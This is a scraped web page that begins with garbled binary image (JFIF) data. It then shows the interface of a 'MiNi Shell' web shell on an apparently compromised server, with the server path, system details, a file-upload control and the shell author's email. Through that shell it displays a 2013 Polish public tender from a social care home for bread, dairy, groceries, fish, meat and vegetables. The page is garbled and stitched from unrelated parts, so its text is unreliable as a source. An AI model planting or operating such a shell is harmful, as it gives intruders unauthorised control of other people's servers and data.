JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/259699-N-2013.html

<p class="kh_header"><b>Nowa Wieś Ełcka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 259699 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej , ul. Lipowa 1, 19-321 Nowa Wieś Ełcka, woj. warmińsko-mazurskie, tel. 087 6197770, 6197779, faks 087 6197490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnwe.fantex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa artykułów spożywczych dla potrzeb Domu Pomocy Społecznej. Przedmiot zamówienia podzielony został odpowiednio na 6 części, zgodnie z załącznikiem nr 1: (część 1 dostawa pieczywa), (część 2 dostawa mleka i jego przetworów), (część 3 dostawa produktów spożywczych), (część 4 dostawa ryb, przetworów rybnych i mrożonek), (część 5 dostawa mięsa i wędlin), (część 6 dostawa warzyw i owoców ), które stanowią integralną część SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.61.25.00-6, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.10.00.00-9, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w jej przedmiocie lub terminie wykonania w następujących przypadkach: 
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
b) z powodu wystąpienia dodatkowych okoliczności, a niemożliwych do przewidzenia przed zawarciem umowy, m.in. związanych ze zmianą ceny w wyniku ustawowej zmiany podatku VAT ),
c) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
d) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
e) Z powodu zmiany uwarunkowań prawnych i formalnych realizacji umowy o zamówienie publiczne, spowodowanych działaniem osób trzecich;
f)Zmiany wykonania umowy na skutek okoliczności, niezależnych i obiektywnych, których Zamawiający nie mógł przewidzieć w dacie sporządzenia SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnwe.fantex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej, 19-300 Nowa Wieś Ełcka, ul. Lipowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 09:00, miejsce: Dom Pomocy Społecznej, 19-300 Nowa Wieś Ełcka, ul. Lipowa 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Chleb zwykły 16000 kg
2 Chleb razowy zwykły lub ze słonecznikiem, soją, ziarnami (450g) 4200 szt
3 Bułka wrocławska (50g) 80000 szt
4 Bułki słodkie z marmoladą, budyniem, makiem, jagodami, jabłkiem, serem, pączek (100g) 6000 szt
5 Pączki (50g) 3400 szt
6 Bułka drożdżowa 360 kg
7 Bułka tarta (500g) 300 szt
8 Ciasto rolada z kremem 140 kg
9 Makowiec extra 60 kg
10 Ciasto ptasie mleczko 60 kg
11 Ciasto metrowiec 140 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i jego przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Masło (200g) 82% tłuszczu 120 kg.
2. Mleko 3,2% 17000 l.
3. Mleko 0,5% 60 l.
4. Śmietana 18% (400g) 3900 szt.
5. Ser żółty gouda, podlaski, edamski, morski 650 kg.
6. Serek topiony (100g) z pieczarkami, szynką, ziołami, szczypiorkiem 6000 szt.
7. Twaróg półtłusty lub tłusty 1600 kg.
8. Serek homogenizowany (100g) 3000 szt.
9. serek twarogowy do smarowania typu sourage (100g) 1500 szt.
10. Jogurt owocowy 150g 12000 szt.
11. Jogurt naturalny typu greckiego(400 ml) 520 szt.
12. Jogurt naturalny (400 ml) 100 szt.
13. Maślanka naturalna (1l) 500 szt.
14. Kefir mały sokólski 1400 szt.
15. Margaryna Delma z masłem lub równoważna (500g) 4500 szt.
16. Margaryna w kostce do pieczenia, smażenia Kasia lub równoważna (250g) 900 szt.
17. Drożdże (100g) 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów spożywczych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Ryż 500 kg
2 Ryż w saszetkach 400 szt
3 Mąka pszenna 1200 kg
4 Mąka ziemniaczana 180 kg
5 Kasza manna 200 kg
6 Kasza jęczmienna drobna (400g, 500g lub 1000g) 400 kg
7 Kasza jęczmienna w saszetkach  (1kartonik 4 razy po 100g) 24 szt
8 Kasza gryczana w saszetkach  (1kartonik 4 razy po 100g) 24 szt
7 Kleik ryżowy błyskawiczny (170g) 150 szt
8 Kaszka mleczno-ryżowa owocowa (230g) 400 szt
9 Kaszka ryżowa bezmleczna (180g) 200 szt
10 Płatki owsiane (0,5kg) 120 kg
11 Budyń (40g) 500 szt
12 Kisiel (40g) 600 szt
13 Makaron Lubella(500g) lub równoważny 2000 szt
14 Herbata liściasta (100g) 1800 szt
15 Kawa Inka (150g) 700 szt
16 Kakao (100g) 200 szt
17 Ocet (0,5l) 180 szt
18 Musztarda (0,9l) kremska, chrzanowa, sarepska 500 szt
19 Ketchup ( 500g) 700 szt
20 Majonez (0,9l) napoleoński 500 szt
21 Olej kujawski (0,9l) lub równoważny 1500 szt
22 Koncentrat pomidorowy Pudliszki 30% (0,9l lub mniejsze) 600 kg
23 Szczaw (240g) 750 szt
24 Ogórek konserwowy (0,9l, ale może byc większy) 700 szt
25 Sałatka wielowarzywna (0,9l) 300 szt
26 Sok owocowy naturalny 100% (2l) 1200 szt
27 Sok owocowy Kubuś 300 ml lub równoważny  1500 szt
28 Syrop owocowy Paola, Łowicz (430g) lub równoważny 1500 szt
29 Dżem (280g) 1800 szt
30 Marmolada (1 kg) 700 szt
31 Płatki śniadaniowe Cini mini,  Nesqick (500g) lub równoważne 100 szt
32 Chrzan (320g) 500 szt
33 Ćwikła z chrzanem (320g) 500 szt
34 Groszek konserwowy (400g) 500 szt
35 Czosnek granulowany 200 szt 
36 Curry (20g) 240 szt
37 Galaretka owocowa (79g) 100 szt
38 Herbatniki  petit-beaure (55g) 1800 szt 
40 Liść laurowy (5g) 400 szt
41 Majeranek (6g) 500 szt
42 Papryka w proszku (16g) 250 szt
43 Pieprz ziołowy (20g) 700 szt
44 Pieprz naturalny (15g) 700 szt
45 Przyprawa w płynie (1l) typu magi 220 szt
46 Sos spaghetti  (0,9l) 300 szt
47 Ziele angielskie (12g) 1400 szt
48 Cukier 3000 kg
49 Przyprawa typu jarzynka (500g) 220 kg
50 Cynamon 240 szt
51 Imbir 50 szt
52 Gałka muszkatołowa mielona 50 szt
53 Cukier  waniliowy 300 szt
54 Miód naturalny (słoik 1,3 kg; 1 kg;   0,38 kg) 100 kg
55 Sól kamienna 750 kg
56 Wafelki (100g) 900 szt
58 Pieczywo chrupkie (bezglutenowe) 220 szt
59 Mąka kukurydziana (bezglutenowa) 20 kg
60 Sok pomidorowy (1l) 100 l
61 Czekolada mleczna Wedel lub równoważna (100g) 600 szt
62 Czekolada bez cukru dla diabetyków (100g) 70 szt
63 Kukurydza konserwowa Pudliszki lub równoważna (400g) 150 szt
64 Makaron bezglutenowy (500g) 30 szt
65 Kasza jaglana (500g) 20 szt
66 Paszteciki sojowe z papryką, pieczarkami, pomidorami, koperkiem (105g) 100 szt
67 Kotlety sojowe (100g) 30 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb, przetworów rybnych i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Filety z miruny SHP (kawałki w tafli 230-280g) 400 kg
2 Kostka (filet) rybna w panierce 350 kg
3 Paluszki (filet) rybne 350 kg
4 Śledź marynowany płaty 40 kg
5 Śledź po wiejsku marynowany 90 kg
6 Matias filety śledziowe w oleju 90 kg
7 Śledź solony płaty 40 kg
8 Paprykarz szczeciński (300g) 400 szt
9 Śledź w oleju (300g) 100 szt
10 Szprot w oleju (300g) 100 szt
11 Szprot w pomidorach (300g) 100 szt
12 Makrela w oleju (300g) 100 szt
13 Makrela w pomidorach (300 g) 100 szt
14 Sałatka rybna (300g) 600 szt
15 Makrela wędzona  500 kg
16 Marchew mrożona kostka 500 kg
17 Mieszanka kompotowa 4-składnikowa (śliwka z pestką, wiśnia z pestka, truskawka, porzeczka czerwona) 950 kg
18 Mieszanka kompotowa 7-składnikowa (śliwka z pestką, wiśnia z pestka, rabarbar, truskawka, porzeczka czerwona, porzeczka czarna) 950 kg
19 Mieszanka warzywna 400 kg
20 Truskawka mrożona 140 kg
21 Pyzy z mięsem 360 kg
22 Pierogi z truskawkami 180 kg
23 Pierogi z jagodami 180 kg
24 Ruskie pierogi 180 kg
25 Pierogi z mięsem 180 kg
26 Pierogi z kapustą i grzybami 120 kg
27 Uszka z grzybami 120 kg
28 Kopytka 180 kg
29 Kalafior 500 kg
30 Brukselka 240 kg
31 Brokuły 240 kg
32 Fasolka szparagowa 380 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Szynka wp b/k 200 kg
2 Boczek wędzony parzony 60 kg
3 Żeberka wp surowe paski extra 250 kg
4 Flak wołowy krojony  200 kg
5 Ozory wp 150 kg
6 Mięso mielone garmażeryjne  200 kg
8 Boczek surowy b/ż 200 kg
9 Golonka wp surowa z/k 100 kg
10 Karczek wp b/k 200 kg
11 Łopatka wp b/k 600 kg
12 Nogi wp surowe 400 kg
13 Podgardle surowe bez skóry 100 kg
14 Serca wp  150 kg
15 Schab wp b/k 200 kg
16 Słonina surowa bez skóry  100 kg
17 Filet z kurczaka 180 kg
18 Udka z kurczaka 800 kg
19 Porcje rosołowe 1200 kg
20 Pachwina wp surowa 150 kg
21 Żołądki drobiowe 150 kg
22 Kurczak świeży 300 kg
23 Golonka prasowana-wędlina 100 kg
24 Wieprzowa II 200 kg
25 Konserwa mięsna (la´schmit, mielonka wieprzowa, turystyczna 300g) 600 szt
26 Przysmak szynkowy 140 kg
27 Rolada drobiowa 150 kg
28 Kiełbasa parówkowa 460 kg
39 Parówki paluszki typu hot-dog 300 kg
30 Mortadela parzona 120 kg
31 Kiełbasa toruńska  300 kg
32 Kiełbasa śląska 250 kg
33 Kiełbasa biała surowa 180 kg
34 Szynka wieprzowa wędzona 300 kg
35 Szynka drobiowa-wędlina 200 kg
36 Mielonka wieprzowa wędlina 400 kg
37 Polędwica sopocka 300 kg
38 Polędwica drobiowa 200 kg
39 Baleron 300 kg
40 Kiełbasa żywiecka 120 kg
41 Pieczeń wp 200 kg
42 Pasztet na wagę 200 kg
43 Kaszanka 180 kg
44 Krupniok 150 kg
45 Pasztetowa w osłonce foliowej 120 kg
46 Pasztetowa we flaku 120 kg
47 Kiełbasa szynkowa 240 kg
48 Wątróbka drobiowa 200 kg
49 Łopatka wołowa b/k 150 kg
50 Pasztet (300g) 400 szt
51 Salami 120 kg
52 Salceson we flaku 140 kg
53 Kiełbasa palcówka  45 kg
54 Szynka wieprzowa wędzona typu swojskiego, wysokogatunkowa 45 kg
55 Schab wędzony, wysokogatunkowy 45 kg
56 Kiełbasa krakowska sucha 45 kg
57 Boczek wędzony typu swojskiego, wysokogatunkowy 45 kg
58 Podudzie z kurczaka wędzone 100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Ziemniaki  17000 kg
2 Groch 100 kg
3 Fasola 200 kg
4 Szczypior 350 szt
5 Por 120 kg
6 Marchew 1500 kg
7 Seler 150 kg
8 Pietruszka 150 kg
9 Buraki 1000 kg
10 Ogórek świeży 120 kg
11 Cebula 600 kg
12 Kalafior 200 szt
13 Pomidory 150 kg
14 Kapusta pekińska 180 kg
15 Kapusta włoska 200 szt
16 Kapusta biała 1600 kg
17 Kapusta kiszona 600 kg
18 Kapusta czerwona 90 kg
19 Ogórek kiszony 650 kg
20 Pieczarki 150 kg
21 Koper 80 szt
22 Natka pietruszki 200 szt
23 Banany 500 kg
24 Jabłka 3200 kg 
25 Jaja 1000 kg
26 Rzodkiewka (pęczek) 100 szt
27 Pomarańcze 600 kg
28 Biała rzodkiew 240 kg
29 Sałata masłowa 70 szt
30 Sałata lodowa 120 szt
31 Cytryna 200 kg
32 Pomidory 300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com